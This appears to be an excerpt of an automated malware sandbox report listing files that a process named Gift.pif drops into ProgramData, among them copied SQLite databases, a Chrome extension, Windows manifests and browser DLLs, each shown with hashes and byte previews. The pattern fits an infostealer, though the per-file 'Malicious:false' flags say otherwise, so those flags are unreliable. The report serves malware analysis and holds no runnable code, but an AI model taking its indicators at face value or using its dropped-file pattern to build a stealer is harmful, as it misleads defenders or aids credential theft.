                                                                        SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                        Malicious:false
                                                                        Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                        C:\ProgramData\CBKJJJDHDGDA\DBFBFB

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2062
                                                                        Entropy (8bit):4.925445222257812
                                                                        Encrypted:false
                                                                        SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                        MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                        SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                        SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                        SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg

                                                                        C:\ProgramData\CBKJJJDHDGDA\DHCBGD

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.136413900497188
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\FBAAAK

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):5242880
                                                                        Entropy (8bit):0.03859996294213402
                                                                        Encrypted:false
                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\FBAAAK-shm

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.017262956703125623
                                                                        Encrypted:false
                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                        Malicious:false
                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\FBGHCG

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):155648
                                                                        Entropy (8bit):0.5407252242845243
                                                                        Encrypted:false
                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\FHDAEH

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2829
                                                                        Entropy (8bit):5.130068712095974
                                                                        Encrypted:false
                                                                        SSDEEP:48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
                                                                        MD5:CD55A48FE382A6820EC4FB55A66C2858
                                                                        SHA1:70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
                                                                        SHA-256:97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
                                                                        SHA-512:37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
                                                                        Malicious:false
                                                                        Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="*".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[*]</pattern>.. </objectSet>.. </include>.. </rules>..

                                                                        C:\ProgramData\CBKJJJDHDGDA\GDAAKK

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):24008
                                                                        Entropy (8bit):6.062446965815151
                                                                        Encrypted:false
                                                                        SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                        MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                        SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                        SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                        SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                                                        • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                        • Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\GIIIIJ

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):159744
                                                                        Entropy (8bit):0.5394293526345721
                                                                        Encrypted:false
                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\HCFCAA

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.6732424250451717
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\HDHCFI

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:Google Chrome extension, version 3
                                                                        Category:dropped
                                                                        Size (bytes):4814
                                                                        Entropy (8bit):7.909739359753065
                                                                        Encrypted:false
                                                                        SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                        MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                        SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                        SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                        SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                        Malicious:false
                                                                        Preview:Cr24....t.........0.."0...*.H.............0.........,.*i....9M..uEW....}.n..u..._3.08.:D.e]..'J...........l..)8`....:..P}........p..w(...v...Cm@....6..8...$._v....#a(.p..o:..=.....ef.C....M+.s.0g..@.'4.$ZN..e.....T.. ...F..;Sij[...&ZTH[.].D.z. ...A..<z...Ti....&..Z&u....D......\un.....................mR...B[.r..X...;.R..*Y...j...x...3.9.h...R.L....a....V%[.W_/v.A}.VV....H..1..s.9lH.7...M..^.|.C5...#..`...dJ.."..8....w......L../.........w....v.A....0..P....JU...~.-..[....K.d..i%.7....?].......1RiP..A.... ...b ...V2............f._~....IH.c.......0.."0...*.H.............0.........]......N..h...A..LY.*..%.s.....d..h#-/.U.I9..,.<.O1.)7.l.:W2..: ...E...2..s..W..T..|3.....W*S2N}.0g...T...b.q..wp.u....Z...)..2e}.r...!.u......@A..A..g.<.+:....m..[.....4..C&...*.."..}/9y%.....*..m..,.y...1...<=."eyI.G.@.3..=.....(.-...M..8A........q......:...L`\.q..?Rn.W/.\a...g...).....Q...8....*.*.J5.Z.~....0.Lt|...d....D......=...}A3bG.Ra.oyZ..BP..,t./.0...w..WA.p.

                                                                        C:\ProgramData\CBKJJJDHDGDA\IDHIEB

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1468
                                                                        Entropy (8bit):5.0065780470180306
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                        MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                        SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                        SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                        SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..

                                                                        C:\ProgramData\CBKJJJDHDGDA\IJDGII

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):98304
                                                                        Entropy (8bit):0.08235737944063153
                                                                        Encrypted:false
                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\IJDGII-shm

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.017262956703125623
                                                                        Encrypted:false
                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                        Malicious:false
                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\CBKJJJDHDGDA\JKJEHJ

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1095
                                                                        Entropy (8bit):4.976174799333973
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
                                                                        MD5:ECC51190BD585AB376691BBDDF2A638B
                                                                        SHA1:84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
                                                                        SHA-256:6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
                                                                        SHA-512:C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc

                                                                        C:\ProgramData\CBKJJJDHDGDA\KFCGDB

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):889
                                                                        Entropy (8bit):5.016955029110262
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
                                                                        MD5:2948FF1C0804EC7DB473BB77EB3FBE4E
                                                                        SHA1:98A97AFC0E4E2B09A17AA0746F455DFD24356357
                                                                        SHA-256:2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
                                                                        SHA-512:8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\* [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..

                                                                        C:\ProgramData\freebl3.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):685392
                                                                        Entropy (8bit):6.872871740790978
                                                                        Encrypted:false
                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: Hq2NRFbvRb.exe, Detection: malicious, Browse
                                                                        • Filename: sorto.exe, Detection: malicious, Browse
                                                                        • Filename: 66af531b832ee_main.exe, Detection: malicious, Browse
                                                                        • Filename: 66af4e35e761b_doz.exe, Detection: malicious, Browse
                                                                        • Filename: 01Y61PeNtn.exe, Detection: malicious, Browse
                                                                        • Filename: 8lGYdT47s1.exe, Detection: malicious, Browse
                                                                        • Filename: jp95FFMUoh.exe, Detection: malicious, Browse
                                                                        • Filename: yLfAxBEcuo.exe, Detection: malicious, Browse
                                                                        • Filename: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, Detection: malicious, Browse
                                                                        • Filename: 66adc1d3f237b_mine.exe, Detection: malicious, Browse
                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\mozglue.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):608080
                                                                        Entropy (8bit):6.833616094889818
                                                                        Encrypted:false
                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\msvcp140.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):450024
                                                                        Entropy (8bit):6.673992339875127
                                                                        Encrypted:false
                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
